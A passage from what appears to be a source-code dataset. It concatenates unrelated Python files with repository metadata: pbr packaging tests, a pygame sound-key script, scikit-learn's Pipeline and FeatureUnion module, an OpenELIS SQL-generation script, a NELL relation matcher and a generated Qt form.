fixtures.EnvironmentVariable('SKIP_GENERATE_AUTHORS'))
self.useFixture(
fixtures.EnvironmentVariable('SKIP_WRITE_GIT_CHANGELOG'))
def test_write_git_changelog(self):
exist_files = [os.path.join(self.root_dir, f)
for f in (".git", ".mailmap")]
self.useFixture(fixtures.MonkeyPatch(
"os.path.exists",
lambda path: os.path.abspath(path) in exist_files))
self.useFixture(fixtures.FakePopen(lambda _: {
"stdout": BytesIO("Author: Foo Bar "
"<[email protected]>\n".encode('utf-8'))
}))
def _fake_read_git_mailmap(*args):
return {"[email protected]": "[email protected]"}
self.useFixture(fixtures.MonkeyPatch("pbr.packaging.read_git_mailmap",
_fake_read_git_mailmap))
packaging.write_git_changelog(git_dir=self.git_dir,
dest_dir=self.temp_path)
with open(os.path.join(self.temp_path, "ChangeLog"), "r") as ch_fh:
self.assertTrue("[email protected]" in ch_fh.read())
def test_generate_authors(self):
author_old = u"Foo Foo <[email protected]>"
author_new = u"Bar Bar <[email protected]>"
co_author = u"Foo Bar <[email protected]>"
co_author_by = u"Co-authored-by: " + co_author
git_log_cmd = (
"git --git-dir=%s log --format=%%aN <%%aE>" % self.git_dir)
git_co_log_cmd = ("git --git-dir=%s log" % self.git_dir)
git_top_level = "git rev-parse --show-toplevel"
cmd_map = {
git_log_cmd: author_new,
git_co_log_cmd: co_author_by,
git_top_level: self.root_dir,
}
exist_files = [self.git_dir,
os.path.join(self.temp_path, "AUTHORS.in")]
self.useFixture(fixtures.MonkeyPatch(
"os.path.exists",
lambda path: os.path.abspath(path) in exist_files))
def _fake_run_shell_command(cmd, **kwargs):
return cmd_map[" ".join(cmd)]
self.useFixture(fixtures.MonkeyPatch(
"pbr.packaging._run_shell_command",
_fake_run_shell_command))
with open(os.path.join(self.temp_path, "AUTHORS.in"), "w") as auth_fh:
auth_fh.write("%s\n" % author_old)
packaging.generate_authors(git_dir=self.git_dir,
dest_dir=self.temp_path)
with open(os.path.join(self.temp_path, "AUTHORS"), "r") as auth_fh:
authors = auth_fh.read()
self.assertTrue(author_old in authors)
self.assertTrue(author_new in authors)
self.assertTrue(co_author in authors)
class BuildSphinxTest(base.BaseTestCase):
scenarios = [
('true_autodoc_caps',
dict(has_opt=True, autodoc='True', has_autodoc=True)),
('true_autodoc_lower',
dict(has_opt=True, autodoc='true', has_autodoc=True)),
('false_autodoc',
dict(has_opt=True, autodoc='False', has_autodoc=False)),
('no_autodoc',
dict(has_opt=False, autodoc='False', has_autodoc=False)),
]
def setUp(self):
super(BuildSphinxTest, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
"sphinx.setup_command.BuildDoc.run", lambda self: None))
from distutils import dist
self.distr = dist.Distribution()
self.distr.packages = ("fake_package",)
self.distr.command_options["build_sphinx"] = {
"source_dir": ["a", "."]}
pkg_fixture = fixtures.PythonPackage(
"fake_package", [("fake_module.py", b"")])
self.useFixture(pkg_fixture)
self.useFixture(base.DiveDir(pkg_fixture.base))
def test_build_doc(self):
if self.has_opt:
self.distr.command_options["pbr"] = {
"autodoc_index_modules": ('setup.cfg', self.autodoc)}
build_doc = packaging.LocalBuildDoc(self.distr)
build_doc.run()
self.assertTrue(
os.path.exists("api/autoindex.rst") == self.has_autodoc)
self.assertTrue(
os.path.exists(
"api/fake_package.fake_module.rst") == self.has_autodoc)
class ParseRequirementsTest(base.BaseTestCase):
def setUp(self):
super(ParseRequirementsTest, self).setUp()
(fd, self.tmp_file) = tempfile.mkstemp(prefix='openstack',
suffix='.setup')
def test_parse_requirements_normal(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_git_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-e git://foo.com/zipball#egg=bar")
self.assertEqual(['bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_versioned_git_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-e git://foo.com/zipball#egg=bar-1.2.4")
self.assertEqual(['bar>=1.2.4'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_http_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("https://foo.com/zipball#egg=bar")
self.assertEqual(['bar'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_with_versioned_http_egg_url(self):
with open(self.tmp_file, 'w') as fh:
fh.write("https://foo.com/zipball#egg=bar-4.2.1")
self.assertEqual(['bar>=4.2.1'],
packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_removes_index_lines(self):
with open(self.tmp_file, 'w') as fh:
fh.write("-f foobar")
self.assertEqual([], packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_removes_argparse(self):
with open(self.tmp_file, 'w') as fh:
fh.write("argparse")
if sys.version_info >= (2, 7):
self.assertEqual([], packaging.parse_requirements([self.tmp_file]))
def test_parse_requirements_override_with_env(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.useFixture(
fixtures.EnvironmentVariable('PBR_REQUIREMENTS_FILES',
self.tmp_file))
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements())
def test_parse_requirements_override_with_env_multiple_files(self):
with open(self.tmp_file, 'w') as fh:
fh.write("foo\nbar")
self.useFixture(
fixtures.EnvironmentVariable('PBR_REQUIREMENTS_FILES',
"no-such-file," + self.tmp_file))
self.assertEqual(['foo', 'bar'],
packaging.parse_requirements())
def test_get_requirement_from_file_empty(self):
actual = packaging.get_reqs_from_files([])
self.assertEqual([], actual)
def test_parse_requirements_with_comments(self):
with open(self.tmp_file, 'w') as fh:
fh.write("# this is a comment\nfoobar\n# and another one\nfoobaz")
self.assertEqual(['foobar', 'foobaz'],
packaging.parse_requirements([self.tmp_file]))
class ParseDependencyLinksTest(base.BaseTestCase):
def setUp(self):
super(ParseDependencyLinksTest, self).setUp()
(fd, self.tmp_file) = tempfile.mkstemp(prefix="openstack",
suffix=".setup")
def test_parse_dependency_normal(self):
with open(self.tmp_file, "w") as fh:
fh.write("http://test.com\n")
self.assertEqual(
["http://test.com"],
packaging.parse_dependency_links([self.tmp_file]))
def test_parse_dependency_with_git_egg_url(self):
with open(self.tmp_file, "w") as fh:
fh.write("-e git://foo.com/zipball#egg=bar")
self.assertEqual(
["git://foo.com/zipball#egg=bar"],
packaging.parse_dependency_links([self.tmp_file]))
def load_tests(loader, in_tests, pattern):
return testscenarios.load_tests_apply_scenarios(loader, in_tests, pattern)
| mit |
ThisIsRobokitty/sound-particle-generator | src/input/proj3keyboardinput.py | 1 | 2957 | '''
Implements mixer to play sound files, sounds can be mapped to keyboard input
Necessary to have sounds files in same file directory
Links to sound libraries:
http://www.findsounds.com/
http://soundcavern.free.fr/guitar/
'''
import pygame,random, array
from pygame.locals import *
xmax = 1000 #width of window
ymax = 600 #height of window
# VVV Added part VVV
#pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.mixer.init(48000, -16, 1, 1024)
pygame.init()
fadeTime=1000
maxTime=0,1,10,100,1000
pygame.mixer.fadeout(fadeTime)
try:
#piano
c3 = pygame.mixer.Sound('input\c3.wav')
c4 = pygame.mixer.Sound('input\c4.wav')
c5 = pygame.mixer.Sound('input\c5.wav')
c6 = pygame.mixer.Sound('input\c6.wav')
c7 = pygame.mixer.Sound('input\c7.wav')
c8 = pygame.mixer.Sound('input\c8.wav')
'''
#guitar
gh3 = pygame.mixer.Sound('input\gh3.wav')
gh4 = pygame.mixer.Sound('input\gh4.wav')
gn3 = pygame.mixer.Sound('input\gn3.wav')
gn4 = pygame.mixer.Sound('input\gn4.wav')
gn5 = pygame.mixer.Sound('input\gn5.wav')
gp3 = pygame.mixer.Sound('input\gp3.wav')
gp4 = pygame.mixer.Sound('input\gp4.wav')
gs3 = pygame.mixer.Sound('input\gs3.wav')
gs4 = pygame.mixer.Sound('input\gs4.wav')
'''
#better guitar
A = pygame.mixer.Sound('input\A.wav')
B = pygame.mixer.Sound('input\B.wav')
D = pygame.mixer.Sound('input\D.wav')
E = pygame.mixer.Sound('input\E.wav')
G = pygame.mixer.Sound('input\G.wav')
#guitar
g1 = pygame.mixer.Sound('input\g1.wav')
g2 = pygame.mixer.Sound('input\g2.wav')
g3 = pygame.mixer.Sound('input\g3.wav')
g4 = pygame.mixer.Sound('input\g4.wav')
g5 = pygame.mixer.Sound('input\g5.wav')
g6 = pygame.mixer.Sound('input\g6.wav')
except:
raise UserWarning("Could not load or play soundfiles in 'data' folder :-(")
def input(event):
if event.key == K_ESCAPE:
exitflag = True
elif event.key == pygame.K_z:
g1.play()
elif event.key == pygame.K_x:
g2.play()
elif event.key == pygame.K_c:
g3.play()
elif event.key == pygame.K_v:
g4.play()
elif event.key == pygame.K_b:
g5.play()
elif event.key == pygame.K_n:
g6.play()
#paino
elif event.key == pygame.K_q:
c3.play()
elif event.key == pygame.K_w:
c4.play()
elif event.key == pygame.K_e:
c5.play()
elif event.key == pygame.K_r:
c6.play()
elif event.key == pygame.K_t:
c7.play()
elif event.key == pygame.K_y:
c8.play()
#guitar
elif event.key == pygame.K_a:
A.play()
elif event.key == pygame.K_s:
B.play()
elif event.key == pygame.K_d:
D.play()
elif event.key == pygame.K_f:
E.play()
elif event.key == pygame.K_g:
G.play()
return random.randint(0,1000)
if __name__ == "__main__":
input() | mit |
ElDeveloper/scikit-learn | sklearn/pipeline.py | 61 | 21271 | """
The :mod:`sklearn.pipeline` module implements utilities to build a composite
estimator, as a chain of transforms and estimators.
"""
# Author: Edouard Duchesnay
# Gael Varoquaux
# Virgile Fritsch
# Alexandre Gramfort
# Lars Buitinck
# Licence: BSD
from collections import defaultdict
from warnings import warn
import numpy as np
from scipy import sparse
from .base import BaseEstimator, TransformerMixin
from .externals.joblib import Parallel, delayed
from .externals import six
from .utils import tosequence
from .utils.metaestimators import if_delegate_has_method
from .externals.six import iteritems
__all__ = ['Pipeline', 'FeatureUnion']
class Pipeline(BaseEstimator):
"""Pipeline of transforms with a final estimator.
Sequentially apply a list of transforms and a final estimator.
Intermediate steps of the pipeline must be 'transforms', that is, they
must implement fit and transform methods.
The final estimator only needs to implement fit.
The purpose of the pipeline is to assemble several steps that can be
cross-validated together while setting different parameters.
For this, it enables setting parameters of the various steps using their
names and the parameter name separated by a '__', as in the example below.
Read more in the :ref:`User Guide <pipeline>`.
Parameters
----------
steps : list
List of (name, transform) tuples (implementing fit/transform) that are
chained, in the order in which they are chained, with the last object
an estimator.
Attributes
----------
named_steps : dict
Read-only attribute to access any step parameter by user given name.
Keys are step names and values are steps parameters.
Examples
--------
>>> from sklearn import svm
>>> from sklearn.datasets import samples_generator
>>> from sklearn.feature_selection import SelectKBest
>>> from sklearn.feature_selection import f_regression
>>> from sklearn.pipeline import Pipeline
>>> # generate some data to play with
>>> X, y = samples_generator.make_classification(
... n_informative=5, n_redundant=0, random_state=42)
>>> # ANOVA SVM-C
>>> anova_filter = SelectKBest(f_regression, k=5)
>>> clf = svm.SVC(kernel='linear')
>>> anova_svm = Pipeline([('anova', anova_filter), ('svc', clf)])
>>> # You can set the parameters using the names issued
>>> # For instance, fit using a k of 10 in the SelectKBest
>>> # and a parameter 'C' of the svm
>>> anova_svm.set_params(anova__k=10, svc__C=.1).fit(X, y)
... # doctest: +ELLIPSIS
Pipeline(steps=[...])
>>> prediction = anova_svm.predict(X)
>>> anova_svm.score(X, y) # doctest: +ELLIPSIS
0.77...
>>> # getting the selected features chosen by anova_filter
>>> anova_svm.named_steps['anova'].get_support()
... # doctest: +NORMALIZE_WHITESPACE
array([ True, True, True, False, False, True, False, True, True, True,
False, False, True, False, True, False, False, False, False,
True], dtype=bool)
"""
# BaseEstimator interface
def __init__(self, steps):
names, estimators = zip(*steps)
if len(dict(steps)) != len(steps):
raise ValueError("Provided step names are not unique: %s" % (names,))
# shallow copy of steps
self.steps = tosequence(steps)
transforms = estimators[:-1]
estimator = estimators[-1]
for t in transforms:
if (not (hasattr(t, "fit") or hasattr(t, "fit_transform")) or not
hasattr(t, "transform")):
raise TypeError("All intermediate steps of the chain should "
"be transforms and implement fit and transform"
" '%s' (type %s) doesn't)" % (t, type(t)))
if not hasattr(estimator, "fit"):
raise TypeError("Last step of chain should implement fit "
"'%s' (type %s) doesn't)"
% (estimator, type(estimator)))
@property
def _estimator_type(self):
return self.steps[-1][1]._estimator_type
def get_params(self, deep=True):
if not deep:
return super(Pipeline, self).get_params(deep=False)
else:
out = self.named_steps
for name, step in six.iteritems(self.named_steps):
for key, value in six.iteritems(step.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
out.update(super(Pipeline, self).get_params(deep=False))
return out
@property
def named_steps(self):
return dict(self.steps)
@property
def _final_estimator(self):
return self.steps[-1][1]
# Estimator interface
def _pre_transform(self, X, y=None, **fit_params):
fit_params_steps = dict((step, {}) for step, _ in self.steps)
for pname, pval in six.iteritems(fit_params):
step, param = pname.split('__', 1)
fit_params_steps[step][param] = pval
Xt = X
for name, transform in self.steps[:-1]:
if hasattr(transform, "fit_transform"):
Xt = transform.fit_transform(Xt, y, **fit_params_steps[name])
else:
Xt = transform.fit(Xt, y, **fit_params_steps[name]) \
.transform(Xt)
return Xt, fit_params_steps[self.steps[-1][0]]
def fit(self, X, y=None, **fit_params):
"""Fit all the transforms one after the other and transform the
data, then fit the transformed data using the final estimator.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
self.steps[-1][-1].fit(Xt, y, **fit_params)
return self
def fit_transform(self, X, y=None, **fit_params):
"""Fit all the transforms one after the other and transform the
data, then use fit_transform on transformed data using the final
estimator.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
if hasattr(self.steps[-1][-1], 'fit_transform'):
return self.steps[-1][-1].fit_transform(Xt, y, **fit_params)
else:
return self.steps[-1][-1].fit(Xt, y, **fit_params).transform(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def predict(self, X):
"""Applies transforms to the data, and the predict method of the
final estimator. Valid only if the final estimator implements
predict.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def fit_predict(self, X, y=None, **fit_params):
"""Applies fit_predict of last step in pipeline after transforms.
Applies fit_transforms of a pipeline to the data, followed by the
fit_predict method of the final estimator in the pipeline. Valid
only if the final estimator implements fit_predict.
Parameters
----------
X : iterable
Training data. Must fulfill input requirements of first step of
the pipeline.
y : iterable, default=None
Training targets. Must fulfill label requirements for all steps
of the pipeline.
"""
Xt, fit_params = self._pre_transform(X, y, **fit_params)
return self.steps[-1][-1].fit_predict(Xt, y, **fit_params)
@if_delegate_has_method(delegate='_final_estimator')
def predict_proba(self, X):
"""Applies transforms to the data, and the predict_proba method of the
final estimator. Valid only if the final estimator implements
predict_proba.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict_proba(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def decision_function(self, X):
"""Applies transforms to the data, and the decision_function method of
the final estimator. Valid only if the final estimator implements
decision_function.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].decision_function(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def predict_log_proba(self, X):
"""Applies transforms to the data, and the predict_log_proba method of
the final estimator. Valid only if the final estimator implements
predict_log_proba.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].predict_log_proba(Xt)
@if_delegate_has_method(delegate='_final_estimator')
def transform(self, X):
"""Applies transforms to the data, and the transform method of the
final estimator. Valid only if the final estimator implements
transform.
Parameters
----------
X : iterable
Data to predict on. Must fulfill input requirements of first step of
the pipeline.
"""
Xt = X
for name, transform in self.steps:
Xt = transform.transform(Xt)
return Xt
@if_delegate_has_method(delegate='_final_estimator')
def inverse_transform(self, X):
"""Applies inverse transform to the data.
Starts with the last step of the pipeline and applies ``inverse_transform`` in
inverse order of the pipeline steps.
Valid only if all steps of the pipeline implement inverse_transform.
Parameters
----------
X : iterable
Data to inverse transform. Must fulfill output requirements of the
last step of the pipeline.
"""
if X.ndim == 1:
warn("From version 0.19, a 1d X will not be reshaped in"
" pipeline.inverse_transform any more.", FutureWarning)
X = X[None, :]
Xt = X
for name, step in self.steps[::-1]:
Xt = step.inverse_transform(Xt)
return Xt
@if_delegate_has_method(delegate='_final_estimator')
def score(self, X, y=None):
"""Applies transforms to the data, and the score method of the
final estimator. Valid only if the final estimator implements
score.
Parameters
----------
X : iterable
Data to score. Must fulfill input requirements of first step of the
pipeline.
y : iterable, default=None
Targets used for scoring. Must fulfill label requirements for all steps of
the pipeline.
"""
Xt = X
for name, transform in self.steps[:-1]:
Xt = transform.transform(Xt)
return self.steps[-1][-1].score(Xt, y)
@property
def classes_(self):
return self.steps[-1][-1].classes_
@property
def _pairwise(self):
# check if first estimator expects pairwise input
return getattr(self.steps[0][1], '_pairwise', False)
def _name_estimators(estimators):
"""Generate names for estimators."""
names = [type(estimator).__name__.lower() for estimator in estimators]
namecount = defaultdict(int)
for est, name in zip(estimators, names):
namecount[name] += 1
for k, v in list(six.iteritems(namecount)):
if v == 1:
del namecount[k]
for i in reversed(range(len(estimators))):
name = names[i]
if name in namecount:
names[i] += "-%d" % namecount[name]
namecount[name] -= 1
return list(zip(names, estimators))
def make_pipeline(*steps):
"""Construct a Pipeline from the given estimators.
This is a shorthand for the Pipeline constructor; it does not require, and
does not permit, naming the estimators. Instead, they will be given names
automatically based on their types.
Examples
--------
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.preprocessing import StandardScaler
>>> make_pipeline(StandardScaler(), GaussianNB()) # doctest: +NORMALIZE_WHITESPACE
Pipeline(steps=[('standardscaler',
StandardScaler(copy=True, with_mean=True, with_std=True)),
('gaussiannb', GaussianNB())])
Returns
-------
p : Pipeline
"""
return Pipeline(_name_estimators(steps))
def _fit_one_transformer(transformer, X, y):
return transformer.fit(X, y)
def _transform_one(transformer, name, X, transformer_weights):
if transformer_weights is not None and name in transformer_weights:
# if we have a weight for this transformer, muliply output
return transformer.transform(X) * transformer_weights[name]
return transformer.transform(X)
def _fit_transform_one(transformer, name, X, y, transformer_weights,
**fit_params):
if transformer_weights is not None and name in transformer_weights:
# if we have a weight for this transformer, muliply output
if hasattr(transformer, 'fit_transform'):
X_transformed = transformer.fit_transform(X, y, **fit_params)
return X_transformed * transformer_weights[name], transformer
else:
X_transformed = transformer.fit(X, y, **fit_params).transform(X)
return X_transformed * transformer_weights[name], transformer
if hasattr(transformer, 'fit_transform'):
X_transformed = transformer.fit_transform(X, y, **fit_params)
return X_transformed, transformer
else:
X_transformed = transformer.fit(X, y, **fit_params).transform(X)
return X_transformed, transformer
class FeatureUnion(BaseEstimator, TransformerMixin):
"""Concatenates results of multiple transformer objects.
This estimator applies a list of transformer objects in parallel to the
input data, then concatenates the results. This is useful to combine
several feature extraction mechanisms into a single transformer.
Read more in the :ref:`User Guide <feature_union>`.
Parameters
----------
transformer_list: list of (string, transformer) tuples
List of transformer objects to be applied to the data. The first
half of each tuple is the name of the transformer.
n_jobs: int, optional
Number of jobs to run in parallel (default 1).
transformer_weights: dict, optional
Multiplicative weights for features per transformer.
Keys are transformer names, values the weights.
"""
def __init__(self, transformer_list, n_jobs=1, transformer_weights=None):
self.transformer_list = transformer_list
self.n_jobs = n_jobs
self.transformer_weights = transformer_weights
def get_feature_names(self):
"""Get feature names from all transformers.
Returns
-------
feature_names : list of strings
Names of the features produced by transform.
"""
feature_names = []
for name, trans in self.transformer_list:
if not hasattr(trans, 'get_feature_names'):
raise AttributeError("Transformer %s does not provide"
" get_feature_names." % str(name))
feature_names.extend([name + "__" + f for f in
trans.get_feature_names()])
return feature_names
def fit(self, X, y=None):
"""Fit all transformers using X.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data, used to fit transformers.
"""
transformers = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_one_transformer)(trans, X, y)
for name, trans in self.transformer_list)
self._update_transformer_list(transformers)
return self
def fit_transform(self, X, y=None, **fit_params):
"""Fit all transformers using X, transform the data and concatenate
results.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data to be transformed.
Returns
-------
X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)
hstack of results of transformers. sum_n_components is the
sum of n_components (output dimension) over transformers.
"""
result = Parallel(n_jobs=self.n_jobs)(
delayed(_fit_transform_one)(trans, name, X, y,
self.transformer_weights, **fit_params)
for name, trans in self.transformer_list)
Xs, transformers = zip(*result)
self._update_transformer_list(transformers)
if any(sparse.issparse(f) for f in Xs):
Xs = sparse.hstack(Xs).tocsr()
else:
Xs = np.hstack(Xs)
return Xs
def transform(self, X):
"""Transform X separately by each transformer, concatenate results.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data to be transformed.
Returns
-------
X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)
hstack of results of transformers. sum_n_components is the
sum of n_components (output dimension) over transformers.
"""
Xs = Parallel(n_jobs=self.n_jobs)(
delayed(_transform_one)(trans, name, X, self.transformer_weights)
for name, trans in self.transformer_list)
if any(sparse.issparse(f) for f in Xs):
Xs = sparse.hstack(Xs).tocsr()
else:
Xs = np.hstack(Xs)
return Xs
def get_params(self, deep=True):
if not deep:
return super(FeatureUnion, self).get_params(deep=False)
else:
out = dict(self.transformer_list)
for name, trans in self.transformer_list:
for key, value in iteritems(trans.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
out.update(super(FeatureUnion, self).get_params(deep=False))
return out
def _update_transformer_list(self, transformers):
self.transformer_list[:] = [
(name, new)
for ((name, old), new) in zip(self.transformer_list, transformers)
]
# XXX it would be nice to have a keyword-only n_jobs argument to this function,
# but that's not allowed in Python 2.x.
def make_union(*transformers):
"""Construct a FeatureUnion from the given transformers.
This is a shorthand for the FeatureUnion constructor; it does not require,
and does not permit, naming the transformers. Instead, they will be given
names automatically based on their types. It also does not allow weighting.
Examples
--------
>>> from sklearn.decomposition import PCA, TruncatedSVD
>>> make_union(PCA(), TruncatedSVD()) # doctest: +NORMALIZE_WHITESPACE
FeatureUnion(n_jobs=1,
transformer_list=[('pca', PCA(copy=True, n_components=None,
whiten=False)),
('truncatedsvd',
TruncatedSVD(algorithm='randomized',
n_components=2, n_iter=5,
random_state=None, tol=0.0))],
transformer_weights=None)
Returns
-------
f : FeatureUnion
"""
return FeatureUnion(_name_estimators(transformers))
| bsd-3-clause |
CalebSLane/openelisglobal-core | liquibase/OE2.9/testCatalogHT_LNSP/scripts/sampleType.py | 6 | 1886 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
existing_types = []
sample_types = []
sample_type_file = open("sampleType.txt")
existing_types_file = open("currentSampleTypes.txt")
results = open("output/sampleTypeOutput.txt", 'w')
def write_massive_type_of_sample():
results.write("\nPaste following in SampleType.sql\n\n")
sql_insert = "INSERT INTO type_of_sample( id, description, domain, lastupdated, local_abbrev, display_key, is_active )\n\tVALUES ("
for line in sample_types:
if line not in existing_types and len(line) > 1:
results.write(sql_insert)
results.write( " nextval( 'type_of_sample_seq' ) , '" + line + "','H', now() , '" + line[:10] + "', 'sample.type." + line.split()[0] + "', 'Y');\n" );
def write_sample_type_order():
results.write("\nPaste following in TypeOrder.sql\n\n")
order = 10
for line in sample_types:
results.write("update clinlims.type_of_sample set sort_order=" + str(order) + " where description ILIKE '" + line + "';\n")
order = order + 10
def write_inactive_list():
results.write('\nPaste following in inactivateSampleTypes.sql in the set inactive list\n\n')
results.write("update clinlims.type_of_sample set is_active=\'N\' where name in (")
for line in existing_types:
if line not in sample_types:
results.write('\'' + line + '\', ')
results.write(');')
for line in sample_type_file:
if len(line) > 1:
if line.strip() not in sample_types:
sample_types.append(line.strip())
for line in existing_types_file:
if len(line) > 0:
existing_types.append(line.strip())
existing_types_file.close()
write_massive_type_of_sample()
write_sample_type_order()
write_inactive_list()
print "Done check file sampleTypeOutput.txt"
results.close(); | mpl-2.0 |
vedsarkushwaha/KBH_NELL | predicate_extraction_node_matching.py | 1 | 3299 | from read_data import read_graph_nodes,read_relation_name
import os
from nltk.stem.snowball import SnowballStemmer
from nltk import word_tokenize
'''
* python file which matches verbs
*
* Copyright 2015 Vedsar
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
def chk_line(line):
if len(line)==0:
return 0
lst=line.split('\t')
if len(lst)<3:
return 0
for i in lst:
if len(i)<1:
return 0
return 1
def node_matching(relations,user_query,dict1):
stemmer=SnowballStemmer('english')
user_query_list=map(str,map(stemmer.stem,word_tokenize(user_query)))
user_query_set=set(user_query_list)
ans_found=0
r=[]
#print user_query_list
#print relations
for j in relations:
#get the subject and object for j
i='concept:'+''.join(j.split(" "))+'/scores.tsv'
source_list=[]
target_list=[]
score_list=[]
#print j
with open(os.path.join('nell_pca_svo_pra',i),'r') as fp:
for line in fp:
if(chk_line(line)):
n1,n2,score=map(float,line.split('\t')[:3])
if score>1:
#print n1,n2
source_list.append(n1)
target_list.append(n2)
score_list.append(score)
#convert node to human readable forms
source_list=read_graph_nodes(dict1,source_list)
target_list=read_graph_nodes(dict1,target_list)
#if any of source list and target list is in user_query_set and 60 % of other user query text matches with the relation j, then print that relation
#this is where we use similarity technique
for i in range(len(source_list)):
#print source_list[i].split(":")[2],target_list[i].split(":")[2]
if stemmer.stem(source_list[i].split(":")[2]) in user_query_list and stemmer.stem(target_list[i].split(":")[2]) in user_query_list:
#print source_list[i],target_list[i]
#get both nodes info, get relation from graph, check 60% matching with user query
relation_info=map(str,map(stemmer.stem,word_tokenize(j)))
relation_info.extend(map(str,map(stemmer.stem,(source_list[i].split(":")[1:]))))
relation_info.extend(map(str,map(stemmer.stem,(target_list[i].split(":")[1:]))))
relation_info_set=set(relation_info)
#print relation_info_set,user_query_set
#print len(relation_info_set.intersection(user_query_set)),len(relation_info_set)/2
if len(relation_info_set.intersection(user_query_set))>len(relation_info_set)*0.4:
r.append(j)
ans_found=1
return r
if __name__=="__main__":
relations=read_relation_name('nell_pca_svo_pra')
dict1={}
with open(os.path.join('nell_pca_svo_graph','node_dict.tsv'),'r') as fp:
for line in fp:
line=line.rstrip('\n')
n_id,name=line.split('\t')
dict1[int(n_id)]=name
user_query=raw_input("Enter the query: ")
r=node_matching(relations,user_query,dict1)
if(len(r)==0):
print 'Not found anything relevant'
else:
for i in r:
print i
| apache-2.0 |
Muugii05/autokey | src/lib/qtui/enginesettings.py | 50 | 2667 | #!/usr/bin/env python
# coding=UTF-8
#
# Generated by pykdeuic4 from enginesettings.ui on Sun Mar 4 11:39:39 2012
#
# WARNING! All changes to this file will be lost.
from PyKDE4 import kdecore
from PyKDE4 import kdeui
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(400, 300)
self.verticalLayout_2 = QtGui.QVBoxLayout(Form)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.groupBox = QtGui.QGroupBox(Form)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(self.groupBox)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.folderLabel = QtGui.QLabel(self.groupBox)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.folderLabel.sizePolicy().hasHeightForWidth())
self.folderLabel.setSizePolicy(sizePolicy)
self.folderLabel.setObjectName(_fromUtf8("folderLabel"))
self.horizontalLayout.addWidget(self.folderLabel)
self.browseButton = QtGui.QPushButton(self.groupBox)
self.browseButton.setObjectName(_fromUtf8("browseButton"))
self.horizontalLayout.addWidget(self.browseButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout_2.addWidget(self.groupBox)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(kdecore.i18n(_fromUtf8("Form")))
